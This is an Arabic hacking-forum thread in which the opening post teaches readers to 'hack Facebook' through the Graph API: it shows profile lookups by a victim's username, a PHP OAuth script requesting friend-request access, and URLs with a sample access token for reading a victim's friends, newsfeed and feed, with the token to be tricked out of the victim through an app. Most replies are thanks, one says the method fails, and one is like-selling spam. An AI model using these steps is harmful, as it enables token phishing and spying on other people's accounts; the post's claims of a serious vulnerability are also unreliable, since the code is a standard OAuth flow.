:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم الـبـريد الإلـكتروني والحسابات العامة (http://www.vbspiders.com/vb/f195.html)
-   -   رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit (http://www.vbspiders.com/vb/t68632.html)

Twi[L]ighT Dz 12-21-2013 07:38 PM

رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
السلام عليكم و رحمة الله تعالى و بركاته

كيف حالكم عناكب :smile:

اليوم أنا جاي أشرح لكم إستغلالات ثغرة في الفايسبوك
هي صعبة قليلا لكن أتمنى أن تتجاوبوا معي
تمام نبدأ على بركة الله :msn-wink:


Graph API Exploit

كما يعلم الكل أن الفايسبوك يحتوي على ملايين المشتركين
و بالتالي فهو يمثل المكان الأمثل لتطبيق مخططاتنا في الإختراق

Graph API Exploit

رغم أن هاته الثغرة إستغلالاتها خطيرة
و أغلب المبرمجين الآن يستغلونها في التحكم بحسابات الفايسبوك
لأن المعلومات التي تقدمها مهمة جدا
إلا أنني لا أجد لها شروحات في المنتديات هناك من سيقول أن الثغرة تافهة
أنا أقولك لا أغلب الإستغلالات بقيت خاصة بمكتشفيها و لم يتم تسريبها في المنتديات
لخطروة إستغلالاتها

فبخبرة قليلة من البرمجة تتمكن من قراءة الرسائل الخاصة لأي حساب تريد
أو إرسال رسائل بأي حساب على الفايسبوك
دون أن ننسى أنها تقدم لنا معلومات تمكننا من إختراق الفايسبوك الهدف


ما هو ال Facebook Graph Api ؟

هو الرسم البياني لل Api
أي جوهر منصة الفايسبوك

برمجة منصة الفاسيبوك مبنية على graph api
و من يستطيع التحكم في ال api
سيتمكن من قراءة و كتابة معطيات في الفايسبوك
بل سيطلق ثورة في إختراق الفايسبوك

الآن هل تريدون اللعب بال Graph Api ؟

حقا ؟

أوكي تابعوا معي الآتي

جرب أكتب الآتي

https://graph.facebook.com/username

غير Username بحساب الضحية
تطلعلك معلومات كالآتي:

كود:

{    "id": "10000000565",    "name": "name of victim",    "first_name": "f name",    "last_name": "l name",    "link": "http://www.facebook.com/victim",    "username": "victim",    "gender": "male",    "locale": "en_GB" }
قراءة طلبات الصداقة للضحية :

تتم قراءة طلبات الصداقة للمستهدف من خلال قراءة Graph Api عن طريق إصدار

طلب "HTTP GET" لمستخدم access_token بإذن أو رخصة read_requests

التطبيق في المتصفح كالآتي:

كود:


https://graph.facebook.com/USER_ID/friendrequests

مع العلم أن :
USER_ID = username
www.facebook.com/username


و عن كيفية الإستغلال
عبارة عن CODE PHP بسيط يوضح الإستغلال في قراءة طلبات الصداقة للضحايا



كود PHP:


<?php
    $app_id 
'YOUR_APP_ID';
    
$app_secret 'YOUR_APP_SECRET';
    
$my_url 'YOUR_URL';
    
$code $_REQUEST["code"];
    echo 
'<html><body>';
    if(!
$code) {
    
// Get permission from the user to publish to their page.
    
$dialog_url "http://www.facebook.com/dialog/oauth?client_id="
    
$app_id "&redirect_uri=" urlencode($my_url)
    . 
"&scope=read_requests";
    echo(
'**********top.location.href="' $dialog_url '";</script>');
    } else {
    
// Get access token for the user
    
$token_url "https://graph.facebook.com/oauth/access_token?client_id="
    
$app_id "&redirect_uri=" urlencode($my_url)
    . 
"&client_secret=" $app_secret
    
"&code=" $code;
    
$access_token file_get_contents($token_url);
    
$notifications "https://graph.facebook.com/me/friendrequests?"
    
$access_token;
    
$response file_get_contents($notifications);
    
$resp_obj json_decode($response,true);
    echo 
'<pre>';
    
print_r($resp_obj);
    echo 
'</pre>';
    }
    echo 
'</body></html>';
    
?>

إذا أردت رؤية الأشخاص الذي عمل لهم بلوك


كود:

https://graph.facebook.com/APP_ID/banned
إذا أردت رؤية إن كان عمل لشخص محدد بلوك


كود:

https://graph.facebook.com/APP_ID/banned/USER_ID
سأوضح أكثر الإستعمال بالمتصفح


https://graph.facebook.com = API GRAPH
بروفايل الفايسبوك المستهدف = /me/
متغير يمكننا تغييره بحسب الحاجة مثلا أردت رؤية = friendsnewsfeed أغيره إلى "home"
227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

يمثل ال access_token

و يجب الحصول عليه من الضحية

بما أن البعض لم يفهم عمل ال php code
هو يستعمل فقط لقراة طلبات الصداقة ..الرسائل ...
ما إلى ذلك يمكنكم التعديل عليه ليتماشى مع الحاجة

بخصوص الحصول على الـ access_token
سهل عن طريق تطبيق فايسبوك





ضروري تغيير /me/ بــ username الشخص المستهدف

و بالتالي الإستغلال يكون كالآتي :


لرؤية طلبات الصداقة للضحية

كود:

https://graph.facebook.com/me/friends?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
لروية newsfeed للضحية


كود:

https://graph.facebook.com/me/home?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4
لرؤية profile freed
يعني رؤية البروفايل www.fb.com/username

كود:

https://graph.facebook.com/me/feed?access_token=2227470867|2.AQAV2PC0-5utxU3a.3600.1315422000.0-100000048512771|PjxTL8WUja9CKJpAgGNoFDpzdq4

أتمنى أن أكون اليوم بشرحي هذا لكم قد وفقت في توضيح بعض الأمور لكم
حتى و لو كانت قليلة و لكنها مجرد بداية

ستمكنكم من دخول إختراق الفايسبوك من بابه الواسع
هي مجرد فكرة و أنتظر منكم تطوريها

و أي شيء أنا هنا في الخدمة




PsYcO_GhOsT 12-22-2013 12:34 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
انا لم افهم اي شى لكن شكرا جزيلا ايها المبدع
تقبل مروري

Twi[L]ighT Dz 12-22-2013 02:32 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
اقتباس:

المشاركة الأصلية كتبت بواسطة PsYcO_GhOsT (المشاركة 473836)
انا لم افهم اي شى لكن شكرا جزيلا ايها المبدع
تقبل مروري

مالذي لم تفهمه أستطيع أن أوضح لك

و لو كان يجب أن أعمل لكم شرح فيديو أنا في الخدمة

شكرا على مرورك :smile:

saaddev 12-23-2013 01:33 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
thnxxxxxxxxxxxxx

Twi[L]ighT Dz 12-23-2013 02:00 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
اقتباس:

المشاركة الأصلية كتبت بواسطة saaddev (المشاركة 473919)
thnxxxxxxxxxxxxx


your welcome bro

mario love 12-28-2013 01:31 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
nice :)

xbahaa 12-29-2013 05:28 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
مشكور اخيييييييييييييي ر اشوف اشرح بدي اضهر الرابط الان

xDrKeeFx 12-29-2013 07:34 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
جزاك الله الف خير , بميزان حسناتك

Twi[L]ighT Dz 12-29-2013 07:53 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكرا على الردود المشجعة

جزاكم الله ألف خير

إن شاء الله

oussema97 12-29-2013 09:54 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
so nice

soufien 12-31-2013 05:20 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
Merci

haithemm 12-31-2013 06:56 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
shoukraaaan

Fsx 12-31-2013 04:45 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكرا لك يا اخي ولكن لم افهم كيفية استخدام ال PHP CODE للحصول على ال ACESS TOKEN ، هل يجب تحميله في موقع و ارساله للشخس المراد إختراقه ؟

dragunov _dz 12-31-2013 05:17 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
الطريقة مو شغالة

أسطوره 01-01-2014 06:08 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
عليكم السلام رحمه الله بركاته

اشكرك اخي الفاضل علي الموضوع المميز

اشكر كل عضو مميز في المنتدي اكثر من روعه تقبلوا خالص تحياتي وتقدري
انا عضو جديد في هذا المنتدي الذي دائما يطرح كل ماهو جديد ومفيد

EleScargo 01-02-2014 06:56 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكراً أخي

khalil97 01-03-2014 02:00 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
merciiiiiiiiiiiii

assoutlm 01-03-2014 08:49 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
..

salahmahdy 01-04-2014 02:02 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
بدايتى معكم وارجو ان تكون موفقة وانا لن استغل شئ الا فى الخير ولدفاع عن دينى وبلدى

Twi[L]ighT Dz 01-04-2014 02:24 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكرا على ردودكم المشجعة
تم تحديث الموضوع بخصوص ال php code
هو لا يأخذ ال access_token
من الضحية بل يستغل عن طريق access_token

بالإضافة لأخذ ال access_token
عن طريق تطبيق فايسبوك

Dz Skull 01-05-2014 07:43 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
مشكووور جزيل الشكر أن شآء الله ـنجح معي وفقك الله

interface 01-09-2014 04:32 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
merci

hyderlazm 01-09-2014 08:42 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكرا جزيلا

ikza9 01-10-2014 01:57 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
THANK YOU VERY MUCH FOR YOUR THIS Twi[L]ighT Dz

سبودر 01-10-2014 08:00 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
-_-

talanet06 01-11-2014 01:21 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
اشكرك اخي الفاضل علي الموضوع الممي

gedyana 01-11-2014 03:12 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
thinkessssssssssss

yassirinhoo 01-12-2014 01:02 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكراا جزييلا على الشرح

Farid-Hacker 01-12-2014 01:20 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكرا لك أخي

nouh 01-14-2014 10:27 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
thnxxxxxxxxxxxxxxxxxxxxxxxxx ;*

smsm2100 01-15-2014 01:02 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
thank you

haducsuc 01-15-2014 04:44 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
Tăng 1.000 Like (photo, status, video, note, comment, album...) Facebook - Với giل 100đ /1 like.

Ưu điểm:

- 100% Like Thật

- Tạo hiệu ứng tương tلc

- Nâng cao giل trị Sản phẩm

- Mang lại uy tيn cho Thương hiệu

- Nâng cao thứ hạng trong cلc cuộc thi ảnh

- Khẳng định tầm quan trọng của Cل nhân, đội nhَm

Liên hệ ngay với tôi để được phục vụ

Mr Khلnh: 0934225077

Yahoo/Skype: hanhtrinh24h

Gmail: dokhanh82
Cلm ơn bạn đم ghé thăm !

jefara 01-16-2014 04:38 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
thnxxxxx

omarchib 01-17-2014 12:56 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
:alla::icon30::icon30:

editeur 01-18-2014 01:11 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
رائع رائع

MANDOMIDO 01-18-2014 03:58 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
رااااااااااااااااااااااااااااااااااااااااااااااااا اااااائع ها الموضوع :clap:

Ra3D MUKalla 01-18-2014 08:44 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
مشكؤؤؤؤؤؤؤؤؤؤؤؤؤؤر

Infamous 01-19-2014 02:00 AM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
:)

the.punsher 01-19-2014 10:52 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
Nice

35sar 01-21-2014 04:09 PM

رد: رؤية أخرى في إختراق الفايسبوك بثغرة Graph API Exploit
 
شكرا
شكرا
شكرا


الساعة الآن 09:33 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0